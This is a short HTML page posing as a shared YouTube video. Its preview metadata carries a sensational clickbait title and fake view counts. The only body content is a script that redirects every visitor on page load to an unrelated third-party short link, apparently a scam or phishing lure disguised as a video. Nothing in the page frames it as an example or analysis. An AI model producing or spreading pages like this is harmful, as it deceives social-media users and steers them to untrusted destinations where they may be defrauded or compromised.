<html>
		<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="./image2.jpeg" />
		<meta property="og:title" content="Look at this young man losing control in the middle of the street, my God." />
		<meta property="og:description" content="963, 8745 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="87741124305" />
	</head>
	<body>
	<script>
        (function () {
            const nuevaURL = 'https://7us2d.app.link';
            window.location.href = nuevaURL;
        })();
    </script>
	</body>
</html>

